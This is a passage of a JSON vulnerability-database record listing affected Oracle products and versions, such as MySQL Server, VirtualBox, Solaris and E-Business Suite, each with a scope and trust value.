"trust": 0.3,
"vendor": "oracle",
"version": "5.0.18"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "utilities work and asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.9.1.2.8"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.3.5"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.2.12"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.1.16"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.5.4"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.4.41"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.10.0.6.27"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.0.0.0"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.5"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.3"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.2"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.7"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.6"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "switch es1-24",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.3"
},
{
"model": "sun network qdr infiniband gateway switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "sun network 10ge switch 72p",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.2"
},
{
"model": "sun data center infiniband switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "362.2.2"
},
{
"model": "sun blade ethernet switched nem 24p 10ge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "60001.2"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2.2"
},
{
"model": "siebel applications ip2016",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2015",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2014",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.71"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.63"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail service backbone",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.16.0"
},
{
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.5"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.3"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.2"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.1"
},
{
"model": "policy automation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.55"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.54"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.53"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2"
},
{
"model": "peoplesoft enterprise fscm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.2"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"model": "outside in technology",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.0"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.29"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.28"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.27"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.26"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.23"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.22"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.21"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.48"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.47"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.46"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.45"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.42"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.41"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.40"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.25"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.24"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.20"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.16"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.15"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.44"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.43"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.36"
},
{
"model": "mysql server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.35"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.7.12"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.6.30"
},
{
"model": "mysql",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5.49"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8.1"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.8"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.7"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.6"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.5"
},
{
"model": "micros retail xbri loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "jrockit r28.3.10",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2.0.5"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance rules palette",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.6.1"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.7.1"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.2"
},
{
"model": "insurance calculation engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2"
},
{
"model": "in-memory policy analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"model": "http server 12c",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "http server 11g",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0.1"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.0"
},
{
"model": "healthcare master person index",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.12"
},
{
"model": "healthcare analytics data integration",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.0.0.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1.0"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0.2.3"
},
{
"model": "health sciences information manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.2.8.3"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2.0"
},
{
"model": "health sciences clinical development center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.1.0"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.1.2"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.1"
},
{
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1.1"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.23.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.10"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.9"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.8"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.7"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.6"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.5"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.4"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.3"
},
{
"model": "fusion applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4s server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-4 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2290"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2271"
},
{
"model": "fujitsu m10-1 server xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2230"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.1"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.3"
},
{
"model": "flexcube direct banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.2"
},
{
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "exalogic infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.3.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.2"
},
{
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.4"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1.0.0"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"model": "enterprise communications broker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.3"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.2"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.5"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.4"
},
{
"model": "e-business suite",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"model": "documaker",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2"
},
{
"model": "demand planning",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
